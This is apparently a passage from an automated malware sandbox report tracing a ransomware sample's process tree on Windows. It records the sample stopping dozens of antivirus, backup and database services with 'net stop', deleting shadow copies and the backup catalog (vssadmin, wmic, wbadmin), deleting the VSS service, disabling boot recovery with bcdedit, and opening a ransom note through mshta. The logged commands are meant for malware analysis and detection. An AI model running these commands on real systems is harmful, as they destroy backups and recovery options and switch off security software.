- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:1832
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4732
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:848
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:3008
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:2440
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:4308
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:1376
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:4348
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:916
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:4840
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:9156
- C:\Windows\SysWOW64\net.exe
  "net.exe" top SavRoam /y
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 top SavRoam /y
    3⤵
    PID:5152
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:452
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5220
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:5000
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5196
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5448
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:3732
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5460
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:3928
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5428
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:1272
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5364
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:528
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4284
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:5660
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:5748
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:3792
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5736
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:5724
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5252
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:5928
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5332
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6000
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5184
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5860
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5396
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6108
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5472
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6120
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6348
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5576
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:6584
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5632
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:7520
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5692
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:8072
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5836
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:7104
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5896
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:8240
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4052
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:4884
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Culserver /y
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Culserver /y
    3⤵
    PID:3056
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sqladhlp /y
  2⤵
  PID:5404
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sqladhlp /y
    3⤵
    PID:8992
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sqlagent /y
  2⤵
  PID:5568
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sqlagent /y
    3⤵
    PID:5272
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sqlbrowser /y
  2⤵
  PID:5624
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sqlbrowser /y
    3⤵
    PID:3420
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Sqlservr /y
  2⤵
  PID:5076
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Sqlservr /y
    3⤵
    PID:8984
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:5456
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:9036
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5440
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:9060
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5152
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:2832
- C:\Windows\SysWOW64\net.exe
  "net.exe" DefWatch
  2⤵
  PID:5340
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 DefWatch
    3⤵
    PID:9092
- C:\Windows\SysWOW64\net.exe
  "net.exe" wrapper
  2⤵
  PID:5384
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 wrapper
    3⤵
    PID:9052
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mysql57
  2⤵
  PID:5192
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mysql57
    3⤵
    PID:9084
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop -n apache24
  2⤵
  PID:1092
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop -n apache24
    3⤵
    PID:9204
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5304
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:9068
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5160
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:6932
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QLADHLP /y
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QLADHLP /y
    3⤵
    PID:4844
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:6092
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:5688
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:3324
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:9196
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:6036
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:9100
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C sc delete VSS
  2⤵
  PID:8088
- - C:\Windows\SysWOW64\sc.exe
    sc delete VSS
    3⤵
    - Launches sc.exe
    PID:10192
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
  2⤵
  PID:5324
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4152
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchange$ /y
  2⤵
  PID:6648
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchange /y
  2⤵
  PID:6640
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop WSBExchange /y
  2⤵
  PID:6624
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:6616
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:6608
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:6600
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:6592
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:6576
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6568
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:6552
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:6544
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:6528
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:6520
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MVarmor64 /y
  2⤵
  PID:6512
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MVArmor /y
  2⤵
  PID:6496
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:6488
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:6480
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:6464
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6456
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6440
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:6432
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:6424
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:6408
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:6400
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop backup /y
  2⤵
  PID:6380
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:6372
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:6364
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mepocs /y
  2⤵
  PID:6356
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop memtas /y
  2⤵
  PID:6340
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$ /y
  2⤵
  PID:6332
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL /y
  2⤵
  PID:6316
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop svc$ /y
  2⤵
  PID:6308
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sql /y
  2⤵
  PID:6300
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop vss /y
  2⤵
  PID:6284
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:6276
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:6260
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBVSS /y
  2⤵
  PID:6252
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:6244
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:6228
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:6220
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:6212
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:6196
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:6188
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:6180
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$MICROSOFT##SSEE /y
  2⤵
  PID:6160
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Exchange /y
  2⤵
  PID:6152
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msftesql /y
  2⤵
  PID:3124
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$KAV_CS_ADMIN_KIT /y
  2⤵
  PID:3700
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:3524
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$KAV_CS_ADMIN_KIT /y
  2⤵
  PID:6044
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:5936
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$MICROSOFT /y
  2⤵
  PID:4424
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop FishbowlMySQL /y
  2⤵
  PID:5232
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:4840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:936
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:6032
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:5128
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ##WID /y
  2⤵
  PID:796
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$MICROSOFT /y
  2⤵
  PID:5276
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop dbeng8 /y
  2⤵
  PID:5268
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop dbsrv12 /y
  2⤵
  PID:5308
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop vmware-converter /y
  2⤵
  PID:3892
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop vmware /y
  2⤵
  PID:5092
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5800
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop tomcat6 /y
  2⤵
  PID:5868
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msmdsrv /y
  2⤵
  PID:5832
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5852
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop FCS /y
  2⤵
  PID:5640
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QuickBooks /y
  2⤵
  PID:5732
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit /y
  2⤵
  PID:5768
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5960
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5792
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
  2⤵
  PID:6004
- C:\Users\Admin\AppData\Local\Temp\lsm.exe
  "C:\Users\Admin\AppData\Local\Temp\lsm.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\is64.bat" "
    3⤵
    PID:5352
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  PID:5680
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  PID:9020
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  PID:9028
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  PID:5840
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  PID:8988

C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
1⤵
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:5040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:1492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop dbeng8 /y
1⤵
PID:3564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:8248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:2968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:1244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:5040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:9460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:9488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MVarmor64 /y
1⤵
PID:9480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FCS /y
1⤵
PID:9472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:9452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:9436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:9428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop memtas /y
1⤵
PID:9420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL /y
1⤵
PID:9412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ /y
1⤵
PID:9404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ##WID /y
1⤵
PID:9396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$KAV_CS_ADMIN_KIT /y
1⤵
PID:9388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:9380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mepocs /y
1⤵
PID:9372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql /y
1⤵
PID:9364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MVArmor /y
1⤵
PID:9356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vmware /y
1⤵
PID:9348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vmware-converter /y
1⤵
PID:9340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop dbsrv12 /y
1⤵
PID:9332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:9324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:9316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:9308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tomcat6 /y
1⤵
PID:9300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:9292

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$KAV_CS_ADMIN_KIT /y
1⤵
PID:9284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MICROSOFT##SSEE /y
1⤵
PID:9276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:9268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Exchange /y
1⤵
PID:9260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:9252

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS /y
1⤵
PID:9244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:9236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:9228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:9220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:4704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sql /y
1⤵
PID:5928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
1⤵
PID:4232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:5320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svc$ /y
1⤵
PID:5932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:3808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FishbowlMySQL /y
1⤵
PID:856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:2128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:4360

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MICROSOFT /y
1⤵
PID:788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:5784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:5824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:5452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:5132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:2928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:1008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:2712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MICROSOFT /y
1⤵
PID:3196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:5628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:3776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:1276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooks /y
1⤵
PID:3200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit /y
1⤵
PID:9212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchange /y
1⤵
PID:9188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:9148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchange$ /y
1⤵
PID:9140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vss /y
1⤵
PID:9128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop backup /y
1⤵
PID:9112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msmdsrv /y
1⤵
PID:9076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:9044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WSBExchange /y
1⤵
PID:8824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:8816

Network

MITRE ATT&CK Enterprise v6

Initial Access

